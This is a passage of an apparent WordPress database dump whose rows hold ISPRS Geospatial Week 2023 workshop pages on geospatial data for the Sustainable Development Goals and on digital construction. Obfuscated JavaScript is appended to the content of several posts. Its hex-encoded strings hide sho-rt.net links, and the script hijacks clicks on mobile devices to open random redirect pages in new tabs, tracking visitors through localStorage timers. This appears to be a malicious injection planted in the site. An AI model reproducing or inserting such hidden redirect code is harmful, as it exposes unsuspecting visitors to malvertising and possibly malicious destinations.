ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:53:17','2022-10-13 23:53:17','',2768,'https://gsw2023.com/?p=2783',0,'revision','',0),
(2784,1,'2022-10-13 23:54:21','2022-10-13 23:54:21','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee</strong></h5>\n<p>⦁ Yifang Ban, KTH Royal Institute of Technology, Sweden<br />\n⦁ Maria Antonia Brovelli, Politecnico di Milano, Italy<br />\n⦁ Silvana Philippi Camboin, Universidade Federal do Paraná: Curitiba, Brazil<br />\n⦁ Jun Chen, National Geomatics Center of China, China<br />\n⦁ Laurent Durieux, GEO secretariat, France<br />\n⦁ Hongchao Fan, Norwegian University of Science and Technology, Germany<br />\n⦁ Gregory Giuliani, University of Geneva, Geneva, Switzerland<br />\n⦁ Songnian Li, Toronto Metropolitan University, Canada<br />\n⦁ Marguerite Madden, University of Georgia, USA<br />\n⦁ Lucy W. Mburu, College of Technology, KCA University, Kenya<br />\n⦁ Terje Midtbø, Norwegian University of Science and Technology, Norway<br />\n⦁ Jon Mills, Newcastle University, UK<br />\n⦁ Petros Patias, Aristotle University, Greece<br />\n⦁ Daniele Oxoli, Politecnico di Milano<br />\n⦁ Shu Peng, National Geomatics Center of China, China<br />\n⦁ Aurélie Sand, Centre National d\'Etudes Spatiales, France<br />\n⦁ Hao Wu, National Geomatics Center of China, China<br />\n⦁ Alexander Zipf, Heidelberg University, Germany[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:54:21','2022-10-13 23:54:21','',2768,'https://gsw2023.com/?p=2784',0,'revision','',0),
(2785,1,'2022-10-14 16:03:29','2022-10-14 16:03:29','','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','draft','open','closed','','','','','2023-02-02 07:07:05','2023-02-02 07:07:05','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2785',0,'dt_portfolio','',0),
(2786,1,'2022-10-14 13:58:19','2022-10-14 13:58:19','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1665787989366-0f496b46c33a63d99224c40c16b5e3dc-6\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 